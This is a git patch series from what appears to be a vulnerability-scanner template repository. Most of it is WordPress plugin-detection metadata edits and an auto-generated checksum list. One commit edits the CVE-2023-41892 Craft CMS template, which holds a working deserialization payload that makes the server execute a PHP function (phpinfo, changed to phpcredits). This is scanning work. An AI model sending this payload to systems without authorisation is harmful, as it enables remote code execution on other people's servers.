diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From b6550ca831678ff50bc383a3762bea5612463bde Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Mon, 18 Sep 2023 14:31:39 +0530
Subject: [PATCH 0415/1090] updated matcher

---
 http/cves/2023/CVE-2023-41892.yaml | 11 +++--------
 1 file changed, 3 insertions(+), 8 deletions(-)

diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml
index bab13aee17..205e4751c7 100644
--- a/http/cves/2023/CVE-2023-41892.yaml
+++ b/http/cves/2023/CVE-2023-41892.yaml
@@ -32,16 +32,11 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
+        action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpcredits"}}
 
-    matchers-condition: and
     matchers:
       - type: word
         words:
-          - "PHP Version"
-          - "PHP Extension"
+          - "PHP Credits"
+          - "PHP Group"
         condition: and
-
-      - type: status
-        status:
-          - 200

From f1a504555120aee3bc7a1ff429ec18aa2228605e Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 09:44:42 +0000
Subject: [PATCH 0417/1090] Auto Generated Templates Checksum [Mon Sep 18
 09:44:42 UTC 2023] :robot:

---
 templates-checksum.txt | 410 ++++++++++++++++++++---------------------
 1 file changed, 205 insertions(+), 205 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 5d818f3695..73710c3dec 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -509,7 +509,7 @@ helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076
 helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410
 helpers/wordpress/plugins/siteorigin-panels.txt:fc4929308af8b80845b3c743a30013a669a02875
 helpers/wordpress/plugins/smart-slider-3.txt:2cddd46563a1ae6eca28eb577f99025fd04568f2
-helpers/wordpress/plugins/so-widgets-bundle.txt:6d762cc150e79ef408e1a9b5423c21aeb1d73f5b
+helpers/wordpress/plugins/so-widgets-bundle.txt:c6d5ac7140dfb0d87b85cbf9a9ae5e18202f1872
 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53
 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84
 helpers/wordpress/plugins/sucuri-scanner.txt:223960ccc78aab169c55e54fb7d9ed6bf1fd29d9
@@ -2685,7 +2685,7 @@ http/default-logins/druid/druid-default-login.yaml:18fd56a96ab97f885ef971464d3ca
 http/default-logins/dvwa/dvwa-default-login.yaml:95d70dd1e620a1940b4b791a16274eed352425c3
 http/default-logins/easyreport/easyreport-default-login.yaml:18a21a147e467f4605ff0f5f795476e7e616137e
 http/default-logins/elasticsearch/elasticsearch-default-login.yaml:d49f8887707fa02c05c5b4e1cd9987842eb7de8c
-http/default-logins/empire/empirec2-default-login.yaml:c1b5a4b9a3c3f21c26dc07536589a42a92874caf
+http/default-logins/empire/empirec2-default-login.yaml:562054687357b8fbf7a7f3e1bed309ea3e6e7268
 http/default-logins/emqx/emqx-default-login.yaml:dfbe73effe5c64725f1e51e022bf71133d785b9f
 http/default-logins/esafenet-cdg-default-login.yaml:da757e9488437ecafc7bb2eb569f00a2086b22a2
 http/default-logins/exacqvision/exacqvision-default-login.yaml:3b9181a16d1bbb5e9ce716ac0662dedceacccdd4
@@ -2994,7 +2994,7 @@ http/exposed-panels/datadog-login.yaml:e85f32bdfc0b3906ece99192691183f9c8144c39
 http/exposed-panels/dataiku-panel.yaml:ba64117fa67cf9a5855679e5197f576902d913de
 http/exposed-panels/davantis-panel.yaml:c03b26bb73911e2dbdf694aca3b2eeee5c0f1b34
 http/exposed-panels/daybyday-panel.yaml:8ed488191a395ea801b2056dceb3f47a7ce0ca2e
-http/exposed-panels/dbgate-panel.yaml:0c96150b4d0727a4f85f61af0b1f95ab48ef4ea1
+http/exposed-panels/dbgate-panel.yaml:43d3582cbd49a71c76a9fdb5993de62b94147848
 http/exposed-panels/defectdojo-panel.yaml:9e0765aa7e93715b22934b41166dcdee56bc268c
 http/exposed-panels/dell-bmc-panel-detect.yaml:00b05c9733ef2cdad0f5b795efeb8c8bb0e02a07
 http/exposed-panels/dell-idrac.yaml:3eb7b3688a666759caa5cf41f9c5b00641edc2aa
@@ -5829,218 +5829,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
